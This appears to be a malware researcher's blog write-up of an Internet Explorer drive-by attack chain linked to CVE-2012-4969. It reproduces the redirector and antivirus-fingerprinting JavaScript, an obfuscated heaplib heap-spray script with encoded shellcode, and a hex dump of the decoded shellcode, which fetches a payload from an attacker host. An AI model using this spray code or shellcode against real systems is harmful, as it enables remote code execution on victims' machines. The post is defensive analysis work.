The Redirection
After fetching the content of 8ace3ds3f4fb.html, I concentrated on the portions that might contain malicious embedded code (such as a redirection, an iframe or JavaScript). It does have some JavaScript embedded, but the one I'm interested in is index.js:
...
Snip
...
</BODY></HTML><script src="hxxp://s11.cnzz[.]com/stat.php?id=4581253&web_id=4581253" language="JavaScript"></script>
<script type="text/javascript" src="index.js" ></script>
Looking into index.js, the code contains an iframe to another URL, hxxp://wmb.5151lp[.]com/kk.html
var bOwa = navigator.userAgent.toLowerCase();
try {
var s;
// The hex escapes spell the ProgID "360SafeLive.Update"; creating it throws unless that 360 component is installed
var ss=new ActiveXObject("\x33\x36\x30\x53\x61\x66\x65\x4C"+"\x69\x76\x65\x2E"+"\x55\x70\x64\x61\x74\x65");
}
catch(s){}
finally {
// Inject the iframe only when the ActiveX creation failed, the browser is not 360SE and it is not IE 9
if((s=="[object Error]") && (bOwa.indexOf("360se")==-1) && (bOwa.indexOf("msie 9")==-1)) {
document.write("<iframe src=hxxp://wmb.5151lp[.]com/kk.html width=116 height=1></iframe>");
}
}
From hxxp://wmb.5151lp[.]com/kk.html, I get an obfuscated JS code (PASTEBIN).
<script>var ckabc=eval;try{alert(a,b,c);}catch(e){ckabc(function(/*ck vip*/p,/*ck vip*/a,/*ck vip*/c,/*ck vip*/k,/*ck vip*/e,/*ck vip*/d/*ck vip*/){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];
...
When it comes to obfuscated JS code, I have been using manual analysis plus SpiderMonkey from the beginning. I found out about JSDetox a few weeks ago, and I must say that manual analysis with JSDetox has become quite handy at times, especially when manually tracking variable values and deobfuscating JS code at the DOM level.
The obfuscated code above has multiple layers of obfuscation, but with JSDetox I use "Send to Analyze" and execute it one more time. From there I get the deobfuscated JS code (PASTEBIN), which contains an iframe to cc.html. Along with the iframe, it also tries to check whether ksafe, Kingsoft Antivirus, 360QBack, 360safe and NOD32 are installed, but not other major AV products. I have no idea why; I suspect they are trying to check whether a fake AV is installed.
function ckrav(){
// Each res:// URL names a resource inside a local executable, so loading it succeeds only when that
// product (ksafe, Kingsoft, 360, ESET NOD32) is installed; the list repeats every path for drives C: to F:
var EasGXqAf1 = ['res://C:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://D:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://E:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://F:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://C:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://D:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://E:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://F:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://C:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://D:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://E:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://F:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://C:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://D:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://E:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://F:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://C:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://D:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://E:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://F:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171'];
for(i = 0; i < EasGXqAf1["length"]; i++) {
ischeck = 1;
x = new Image();
x["src"] = "";
// onerror fires when the res:// resource cannot be loaded, i.e. the executable is absent
x["onerror"] = function() {
ischeck = 0;
};
x["src"] = EasGXqAf1[i];
// No error means one of the probed products is present: report it and stop
if(ischeck == 1) {
return 1;
}
delete x;
}
return 0;
}
// The next stage is embedded only when none of the probed products was found
if(!ckrav()) {
document.write("<iframe src=cc.html width=116 height=1></iframe>");
}
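As an added example (not code from the original post), a small Python triage helper for the two checks above: it decodes the hex-escaped ActiveXObject argument from index.js and parses the res:// probe list from the deobfuscated kk.html script, so the fingerprinted products can be read off directly. The inputs are copied from the scripts above, with the probe list shortened to one drive per product.

```python
"""Triage helper for the redirector scripts: decode the escaped ProgID
and list the products probed through res:// URLs."""
import re
from urllib.parse import unquote

# Inputs copied from the scripts above (probe list shortened to one drive each).
ACTIVEX_ARG = r'"\x33\x36\x30\x53\x61\x66\x65\x4C"+"\x69\x76\x65\x2E"+"\x55\x70\x64\x61\x74\x65"'
RES_PROBES = [
    'res://C:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100',
    'res://D:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100',
    'res://C:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308',
    'res://C:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133',
    'res://C:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102',
    'res://C:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171',
]

def decode_js_string_concat(expr):
    """Join a JS "..."+"..." concatenation and resolve its \\xNN escapes."""
    parts = re.findall(r'"((?:\\x[0-9A-Fa-f]{2}|[^"\\])*)"', expr)
    raw = ''.join(parts)
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), raw)

# res://<drive>:\<path to exe>/<resource type>/<resource id>
RES_RE = re.compile(r'^res://(?P<drive>[A-Z]):\\(?P<path>.+?\.exe)/(?P<rtype>[A-Z]+)/(?P<rid>\d+)$')

def parse_res_probe(url):
    """Split a res:// URL into drive, executable path, and the resource it asks for."""
    m = RES_RE.match(url)
    if not m:
        return None
    return {
        'drive': m.group('drive'),
        'exe': unquote(m.group('path')),          # undo the %20 encoding of the path
        'resource': (m.group('rtype'), int(m.group('rid'))),
    }

def fingerprinted_products(urls):
    """Distinct executables probed, ignoring the drive letter the script loops over."""
    seen = []
    for u in urls:
        p = parse_res_probe(u)
        if p and p['exe'] not in seen:
            seen.append(p['exe'])
    return seen

if __name__ == '__main__':
    print(decode_js_string_concat(ACTIVEX_ARG))
    for exe in fingerprinted_products(RES_PROBES):
        print(exe)
```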
Following the content of hxxp://wmb.5151lp[.]com/cc.html, the code contains another iframe, to ppp.html, and external JS code from a 51.la URL. I had actually read about the 51la malware previously on Donovan's blog post, but I still don't get what it (the 51la malware) actually does. However, according to his latest post, Norman Lab has confirmed that it is malicious.
Below is the content of cc.html:
<script language="JavaScript">
function lovexckwm(){
var ckxo = navigator.userAgent.toLowerCase();
var polo = new String(document.cookie);
var colo = "ck006=";
var cksun = polo.indexOf(colo);
// Serve each visitor only once: the ck006 cookie marks a browser that has already been handled
if (cksun == -1)
{
var osome = new Date();
// Cookie lifetime of one hour
osome.setTime(osome.getTime()+1*60*60*1000);
document.cookie = "ck006=yes;expires=" + osome.toGMTString();
// Only Internet Explorer receives the next iframe
if(ckxo.indexOf("msie")>0)
{
document.write("<iframe src=ppp.html width=60 height=1></iframe>");
}
}
}
lovexckwm();
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51[.]la/14908642.js"></script>
The Exploitation
I downloaded ppp.html and 14908642.js from the two URLs inside cc.html.
The content of 14908642.js (PASTEBIN) is somewhat similar to what Donovan showed in his blog post, which raised our suspicion about why the <img> tag has an .asp extension in its src attribute.
Moving on to ppp.html, I get a heavily obfuscated JS code which I then manually analyzed with JSDetox to strip the script from the HTML tags (beautified version in PASTEBIN). With the beautified version, I identified two parts in the content: (1) an obfuscation layer using a packed function, and (2) the heaplib exploitation library developed by Alexander Sotirov.
The Shellcode
Since heaplib.js requires shellcode to deliver the payload, I'm pretty sure it resides in the obfuscated part of the code. By deobfuscating the first part of the code (PASTEBIN), I managed to see the obfuscated shellcode along with another copy of the heaplib exploitation library.
From there, I deobfuscated the shellcode and got:
<script>
// Inserts the marker "cgTw6" before every 4 hex digits; the marker is replaced with "%u" later on
function ckckckckckckckck(__){var _='';for(var ___=0;___<__['length'];___+=4){_+='cgTw6'+__.substr(___,4);} return _;}
var x1 = new Array, x2 = '', x3;
// ss is a numeric array defined elsewhere in the page (not shown); each element minus 38 yields a hex string
for(var i=0;i<ss.length;i++ ){x1[i]=ss[i]-38;x2+=x1[i].toString(16);}
x3 = ckckckckckckckck(x2);
var Abqj6 = '%'+'u';
var ckwmckwm = Abqj6+'90'+'90'+Abqj6+'90'+'90'+Abqj6+'5858'+'cgTw65858cgTw610EBcgTw64B5BcgTw6C933cgTw6B966cgTw603B8cgTw63480cgTw6BD0BcgTw6FAE2cgTw605EBcgTw6EBE8'+'cgTw6FFFF'+Abqj6+'54FFcgTw6BEA3'+'cgTw6bdbdcgTw6D9E2'+'cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536'+'cgTw636B5cgTw6D74AcgTw6E4ACcgTw60355cgTw6BDBF'+'cgTw62DBDcgTw6455F'+'cgTw68ED5'+'cgTw6'+'BD8F'+'cgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw6B1FBcgTw60355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4B8cgTw62355'+'cgTw6BDBF'+'cgTw65FBDcgTw6D544cgTw6D3D2cgTw6BDBDcgTw6C8D5cgTw6D1CFcgTw6E9D0cgTw6AB42cgTw67D38cgTw6AEC8cgTw6D2D5cgTw6BDD3cgTw6D5BDcgTw6CFC8cgTw6D0D1cgTw636E9cgTw6B1FBcgTw63355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4BCcgTw6D355cgTw6BDBFcgTw65FBDcgTw6D544'+'cgTw68ED1'+'cgTw6BD8FcgTw6CED5cgTw6D8D5'+Abqj6+'E9D1cgTw6FB36cgTw655B1cgTw6BCD2cgTw6BDBDcgTw65536cgTw6BCD7cgTw655E4cgTw6BFF2cgTw6BDBDcgTw6445FcgTw6513CcgTw6BCBDcgTw6BDBDcgTw66136cgTw67E3CcgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6A7D7cgTw6D7EEcgTw642BDcgTw6E1EBcgTw67D8EcgTw63DFDcgTw6BE81'+'cgTw6C8BD'+'cgTw67A44cgTw6BEB9cgTw6D6E1cgTw6D893cgTw6F97AcgTw6B9BEcgTw6D8C5cgTw6BDBDcgTw6748EcgTw6ECECcgTw6EAEEcgTw68EECcgTw6367DcgTw6E5FBcgTw69F55cgTw6BDBCcgTw63EBDcgTw6BD45cgTw638B2cgTw6BD68cgTw6BDBDcgTw6BDD7cgTw6BDD7cgTw6BED7cgTw6BDD7cgTw6BFD7cgTw6BDD5cgTw6BDBDcgTw6EE7DcgTw6FB36cgTw65599cgTw6BCBCcgTw6BDBDcgTw6FB34cgTw6D7DDcgTw6EDBDcgTw6EB42cgTw63495cgTw6D9FBcgTw6FB36cgTw6D7DDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw6D7B9cgTw6EDBDcgTw6EB42cgTw6D791cgTw6D7BDcgTw6D7BDcgTw6D5BDcgTw6BDA2cgTw6BDB2cgTw642EDcgTw681EBcgTw6FB34cgTw636C5cgTw6D9F3cgTw6C13DcgTw642B5cgTw6C91FcgTw63DB1cgTw6B5C1'+'cgTw6BD42'+'cgTw6B8C9'+'cgTw6C93DcgTw642B5'+'cgTw65F1F'+'cgTw63456'+'cgTw63D3BcgTw6BDBDcgTw67ABDcgTw6CDFBcgTw6BDBDcgTw6BDBDcgTw6FB7AcgTw6BDC9cgTw6BDBDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw636BDcgTw6DDFBcgTw642EDcgTw685EBcgTw63B36cgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6F330cgTw6ECC9cgTw6CB42cgTw6EDCDcgTw6CB42cgTw642DDcgTw68DEBcgTw6CB42'+'cgTw642DDcgTw689EBcgTw6CB42cgTw642C5cgTw6FDEBcgTw64636cgTw67D8EcgTw6668EcgTw6513Ccg
Tw6BFBDcgTw6BDBDcgTw67136cgTw6453EcgTw6C0E9cgTw634B5cgTw6BCA1cgTw67D3EcgTw656B9cgTw6364EcgTw63671cgTw63E64cgTw6AD7EcgTw67D8EcgTw6ECEDcgTw6EDEEcgTw6EDEDcgTw6EDED'+'cgTw6EAED'+'cgTw6EDEDcgTw6EB42cgTw636B5cgTw6E9C3cgTw6AD55cgTw6BDBCcgTw655BDcgTw6BDD8cgTw6BDBDcgTw6DED5cgTw6CACBcgTw6D5BDcgTw6D5CEcgTw6D2D9cgTw636E9cgTw6B1FBcgTw69955cgTw6BDBDcgTw634BDcgTw681FBcgTw61CD9cgTw6BDB9cgTw6BDBDcgTw61D30cgTw642DDcgTw64242cgTw6D8D7cgTw6CB42cgTw63681cgTw6ADFBcgTw6B555cgTw6BDBD'+'cgTw68EBDcgTw6EE66cgTw6EEEEcgTw642EEcgTw63D6DcgTw65585cgTw6853DcgTw6C854cgTw63CACcgTw6B8C5cgTw62D2DcgTw62D2DcgTw6B5C9cgTw64236cgTw636E8cgTw63051cgTw6B8FDcgTw65D42cgTw61B55cgTw6BDBDcgTw67EBDcgTw61D55cgTw6BDBDcgTw605BDcgTw6BCACcgTw63DB9cgTw6B17FcgTw655BD'+'cgTw6BD2EcgTw6BDBDcgTw6513CcgTw6BCBDcgTw6BDBDcgTw64136cgTw67A3EcgTw67AB9cgTw68FBAcgTw62CC9cgTw67AB1cgTw6B9FAcgTw634DEcgTw6F26CcgTw6FA7AcgTw61DB5cgTw62AD8cgTw67A76cgTw6B1FAcgTw6FDECcgTw6C207cgTw6FA7AcgTw683ADcgTw60BA0cgTw67A84'+Abqj6+'A9FAcgTw6D405'+'cgTw6A669cgTw6FA7AcgTw603A5cgTw6DBC2cgTw67A1DcgTw6A1FAcgTw61441cgTw6108AcgTw6FA7AcgTw6259DcgTw6ADB7cgTw6D945cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536cgTw636B5cgTw6D74AcgTw6E4B9cgTw6E955cgTw6BDBDcgTw62DBDcgTw6455FcgTw68ED5'+'cgTw6BD8FcgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw655BBcgTw642E8cgTw64242cgTw65536cgTw6B8D7cgTw655E4cgTw6BD88cgTw6BDBDcgTw6445FcgTw6428EcgTw642EAcgTw6B9EBcgTw6BF56cgTw67EE5cgTw64455cgTw64242cgTw6E642cgTw6BA7BcgTw63405cgTw6BCE2cgTw67ADBcgTw6B8FAcgTw65D42cgTw6EE7EcgTw66136cgTw6D7EEcgTw6D5FDcgTw6ADBDcgTw6BDBDcgTw636EA'+'cgTw69DFBcgTw6A555cgTw64242cgTw6E542cgTw6EC7EcgTw636EBcgTw681C8cgTw6C936cgTw6C593cgTw648BEcgTw636EBcgTw69DCBcgTw648BEcgTw6748EcgTw6FCF4cgTw6BE10cgTw68E78cgTw6B266'+'cgTw6AD03cgTw66B87cgTw6B5C9cgTw6767CcgTw6BEBAcgTw6FD67cgTw64C56cgTw6A286cgTw65AC8cgTw636E3cgTw699E3cgTw660BEcgTw636DBcgTw6F6B1cgTw6E336cgTw6BEA1cgTw63660cgTw636B9cgTw678BEcgTw6E316cgTw67EE4cgTw66055cgTw64241cgTw60F42cgTw65F4FcgTw68449'+'cgTw6C05FcgTw6673EcgTw6C6F5cgTw68F80cgTw62CC9cgTw638B1cgTw61262
cgTw6DE06cgTw66C34cgTw6ECF2cgTw607FDcgTw61DC2cgTw62AD8cgTw6A376cgTw6D919cgTw62E52cgTw6598FcgTw63329cgTw6B7AEcgTw67F11cgTw6F6A4cgTw679BCcgTw6A230cgTw6EAC9cgTw6B0DBcgTw6FE42cgTw61103'+'cgTw6C066cgTw6184DcgTw6EF27cgTw61A43cgTw68367cgTw60BA0cgTw60584'+Abqj6+'69D4cgTw603A6cgTw6DBC2cgTw6411DcgTw68A14cgTw62510cgTw6ADB7cgTw63D45cgTw6126BcgTw64627'+Abqj6+'A8EE'+x3+'cgTw6C3C3';
// Turn the markers back into %u escapes and decode them into the raw shellcode string
var code = unescape(ckwmckwm.replace(/cgTw6/g,Abqj6));
var nops = unescape("%"+"u0c0"+"c"+"%"+"u0c0"+"c");
var nops_90 = unescape("%"+"ub3d6"+"%"+"u4f92");
while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, 0x100);
// One spray unit: 0x100 characters of padding, the shellcode, then padding up to 0x800 characters
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
The shellcode is somehow encoded with XOR. Using Malzilla, I managed to get the XOR key, which is "BD". From there, it is a normal payload that downloads and executes ttxz.txt from the same server. The name implies that we are dealing with a text file, but in fact it is a data file.
00000000 2d 2d 2d 2d e5 e5 e5 e5 56 ad e6 f6 8e 74 db 04 |----....V....t..| 00000010 05 be 3d 89 b6 00 5f 47 56 b8 55 56 42 42 42 e9 |..=..._GV.UVBBB.| 00000020 1e 03 00 00 5f 64 a1 30 00 00 00 8b 40 0c 8b 70 |...._d.0....@..p| 00000030 1c ad 8b 68 08 8b f7 6a 11 59 e8 be 02 00 00 90 |...h...j.Y......| 00000040 e2 f8 68 33 32 00 00 68 55 73 65 72 54 8b 46 0c |..h32..hUserT.F.| 00000050 e8 be 01 00 00 8b e8 6a 05 59 e8 9e 02 00 00 e2 |.......j.Y......| 00000060 f9 68 6f 6e 00 00 68 75 72 6c 6d 54 ff 16 85 c0 |.hon..hurlmT....| 00000070 75 13 68 6f 6e 00 00 68 75 72 6c 6d 54 8b 46 0c |u.hon..hurlmT.F.| 00000080 e8 8e 01 00 00 8b e8 6a 01 59 e8 6e 02 00 00 e2 |.......j.Y.n....| 00000090 f9 68 6c 33 32 00 68 73 68 65 6c 54 8b 46 0c e8 |.hl32.hshelT.F..| 000000a0 6f 01 00 00 8b e8 6a 01 59 e8 4f 02 00 00 e2 f9 |o.....j.Y.O.....| 000000b0 81 ec 00 01 00 00 8b dc 81 c3 80 00 00 00 6a 00 |..............j.| 000000c0 6a 1a 53 6a 00 ff 56 5c 33 c0 40 80 3c 03 00 75 |j.Sj..V\3.@.<..u| 000000d0 f9 c7 04 03 5c 6b 2e 65 c7 44 03 04 78 65 00 00 |....\k.e.D..xe..| 000000e0 33 c9 51 51 53 57 51 33 c0 8b 46 58 e8 22 01 00 |3.QQSWQ3..FX."..| 000000f0 00 83 f8 00 0f 85 d5 00 00 00 6a 00 6a 00 6a 03 |..........j.j.j.| 00000100 6a 00 6a 02 68 00 00 00 c0 53 8b 46 24 e8 01 01 |j.j.h....S.F$...| 00000110 00 00 89 46 60 6a 00 50 ff 56 28 89 46 64 8b 46 |...F`j.P.V(.Fd.F| 00000120 60 6a 00 6a 00 6a 00 6a 04 6a 00 50 ff 56 2c 6a |`j.j.j.j.j.P.V,j| 00000130 00 6a 00 6a 00 68 1f 00 0f 00 50 ff 56 3c 89 46 |.j.j.h....P.V<.F| 00000140 78 8b 4e 64 80 7c 08 ff a2 74 0c 80 7c 08 ff 00 |x.Nd.|...t..|...| 00000150 74 05 80 74 08 ff a2 e2 eb 89 86 80 00 00 00 c7 |t..t............| 00000160 46 70 00 00 00 00 c7 46 74 00 00 00 00 6a 00 6a |Fp.....Ft....j.j| 00000170 00 6a 00 8b 46 60 50 ff 56 38 8b 86 80 00 00 00 |.j..F`P.V8......| 00000180 6a 00 8d 4e 74 51 ff 76 70 50 ff 76 60 ff 56 30 |j..NtQ.vpP.v`.V0| 00000190 ff 76 60 ff 56 34 ff 76 78 ff 56 40 8b fb 33 c0 |.v`.V4.vx.V@..3.| 000001a0 33 db 81 ec 00 
02 00 00 8b cc 83 f8 54 7d 08 89 |3...........T}..| 000001b0 1c 01 83 c0 04 eb f3 8b cc 8b d9 83 c3 10 33 c0 |..............3.| 000001c0 50 51 53 50 50 50 50 50 50 57 50 50 ff 56 08 8b |PQSPPPPPPWPP.V..| 000001d0 7e 54 e8 10 01 00 00 e8 65 00 00 00 68 63 76 77 |~T......e...hcvw| 000001e0 00 68 73 68 64 6f 54 8b 46 0c e8 24 00 00 00 89 |.hshdoT.F..$....| 000001f0 46 3c 64 a1 04 00 00 00 8d a0 60 ff ff ff 6a 65 |F<d.......`...je| 00000200 ff 76 3c 8b 46 10 e8 08 00 00 00 33 db 53 53 53 |.v<.F......3.SSS| 00000210 53 ff d0 80 38 e8 80 38 e9 75 11 81 78 05 90 90 |S...8..8.u..x...| 00000220 90 90 74 08 8b ff 55 8b ec 8d 40 05 ff e0 e8 a6 |..t...U...@.....| 00000230 00 00 00 c3 e8 a0 00 00 00 b8 11 01 04 80 c2 0c |................| 00000240 00 e8 93 00 00 00 81 ec 00 01 00 00 8b fc 83 c7 |................| 00000250 04 c7 07 32 74 91 0c c7 47 04 63 89 d1 4f c7 47 |...2t...G.c..O.G| 00000260 08 a0 65 97 cb c7 47 0c 51 40 ba 7f c7 47 10 3e |..e...G.Q@...G.>| 00000270 1d b6 39 c7 47 14 b8 69 d4 1b c7 47 18 be 7f 66 |..9.G..i...G...f| 00000280 a0 c7 47 1c fc a9 37 ad c7 47 20 98 0a 10 f8 64 |..G...7..G ....d| 00000290 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 68 08 8b |.0....@..p...h..| 000002a0 f7 6a 04 59 e8 54 00 00 00 90 e2 f8 68 33 32 00 |.j.Y.T......h32.| 000002b0 00 68 55 73 65 72 54 8b 06 e8 55 ff ff ff 8b e8 |.hUserT...U.....|000002c0 6a 05 59 e8 35 00 00 00 e2 f9 33 ff 57 ff 56 04 |j.Y.5.....3.W.V.| 000002d0 eb 02 58 c3 e8 f9 ff ff ff 5b c6 07 b8 89 5f 01 |..X......[...._.| 000002e0 66 c7 47 05 ff e0 c3 53 8b dc 53 6a 40 68 00 10 |f.G....S..Sj@h..| 000002f0 00 00 57 8b 46 20 e8 18 ff ff ff 58 c3 51 56 8b |..W.F .....X.QV.| 00000300 75 3c 8b 74 2e 78 03 f5 56 8b 76 20 03 f5 33 c9 |u<.t.x..V.v ..3.| 00000310 49 41 ad 03 c5 33 db 0f be 10 3a d6 74 08 c1 cb |IA...3....:.t...| 00000320 07 03 da 40 eb f1 3b 1f 75 e7 5e 8b 5e 24 03 dd |...@..;.u.^.^$..| 00000330 66 8b 0c 4b 8b 5e 1c 03 dd 8b 04 8b 03 c5 ab 5e |f..K.^.........^| 00000340 59 c3 e8 dd fc ff ff b2 f2 e2 f4 39 e2 
7d 83 da |Y..........9.}..| 00000350 48 7b 3d 32 74 91 0c 85 df af bb 63 89 d1 4f 51 |H{=2t......c..OQ| 00000360 40 ba 7f a0 65 97 cb 1e a4 64 ef 93 32 e4 94 8e |@...e....d..2...| 00000370 13 0a ac c2 19 4b 01 c4 8d 1f 74 57 66 0d ff 43 |.....K....tWf..C| 00000380 be ac db 7d f0 a5 9a 52 fe a7 da 3e 1d b6 39 b8 |...}...R...>..9.| 00000390 69 d4 1b be 7f 66 a0 fc a9 37 ad 98 0a 10 f8 80 |i....f...7......| 000003a0 d6 af 9a fb 53 15 66 68 74 74 70 3a 2f 2f 77 6d |....S.fhttp://wm| 000003b0 62 2e 35 31 35 31 6c 70 2e 63 6f 6d 2f 74 74 78 |b.5151lp[.]com/ttx| 000003c0 7a 2e 74 78 74 00 7e 7e |z.txt.~~|
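As an added example (not code from the original post), here is a Python port of the decoding pipeline the script above performs: the cgTw6 placeholder that ckckckckckckckck inserts before every four hex digits, unescape() of the %uXXXX units into little-endian bytes, and the single-byte XOR with BD found with Malzilla. The input is the first eleven units of the ckwmckwm string, and the result is checked against the first 22 bytes of the hex dump above.

```python
"""Decode the %u-encoded, marker-obfuscated shellcode string from ppp.html."""
import re

PLACEHOLDER = 'cgTw6'   # stands in for '%u' until the script's final replace()

def insert_placeholder(hexdigits):
    """Port of ckckckckckckckck(): prefix every 4 hex digits with the marker."""
    return ''.join(PLACEHOLDER + hexdigits[i:i + 4]
                   for i in range(0, len(hexdigits), 4))

def js_unescape_to_bytes(s):
    """Emulate unescape() on a string made only of %uXXXX units: each unit
    becomes one UTF-16 code unit, i.e. two little-endian bytes in memory."""
    units = re.findall(r'%u([0-9A-Fa-f]{4})', s)
    if len(units) * 6 != len(s):
        raise ValueError('string is not purely %uXXXX units')
    return b''.join(int(u, 16).to_bytes(2, 'little') for u in units)

def xor_decode(data, key=0xBD):
    """Single-byte XOR, the key the post recovered with Malzilla."""
    return bytes(b ^ key for b in data)

# Constructed input: the first eleven units of ckwmckwm as written in the
# script, with Abqj6 ('%u') already expanded for the first three.
ENCODED = ('%u9090%u9090%u5858'
           + 'cgTw65858cgTw610EBcgTw64B5BcgTw6C933cgTw6B966'
           + 'cgTw603B8cgTw63480cgTw6BD0B')

def decode_sample(encoded=ENCODED):
    """Return (raw bytes as sprayed, bytes after XOR with 0xBD)."""
    code = js_unescape_to_bytes(encoded.replace(PLACEHOLDER, '%u'))
    return code, xor_decode(code)

if __name__ == '__main__':
    raw, dec = decode_sample()
    print('raw:', raw.hex(' '))
    print('xor:', dec.hex(' '))
```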
The Binary
I managed to get the binary. However, I'm a bit confused, as the binary seems not to be a valid Windows executable format and it won't execute in a sandbox. I sent the sample to VT, which resulted in 0/0 (https://www.virustotal.com/file/7b46896e5d6113b472fbf3ca95bcd2139671de480e2c4dbf165b21ef0dde055a/analysis/).
If any of you readers would like to have the sample for further analysis, just ping me and I would love to share it; feel free to share any findings from it if you have some.
Conclusion
From the analysis, and some other research, my verdict is that this exploitation has to do with the CVE-2012-4969 vulnerability. The src of the <img> tag, which is assigned a 51.la URL, might have returned the value "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH" to exploit the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9, which allows remote attackers to execute arbitrary code.
As for the binary itself, it is not the final payload delivered to the users. With its file size of 8.0KB, it might be used as an intermediary to download another binary to install on the user's computer.
That's it for now, bye bye.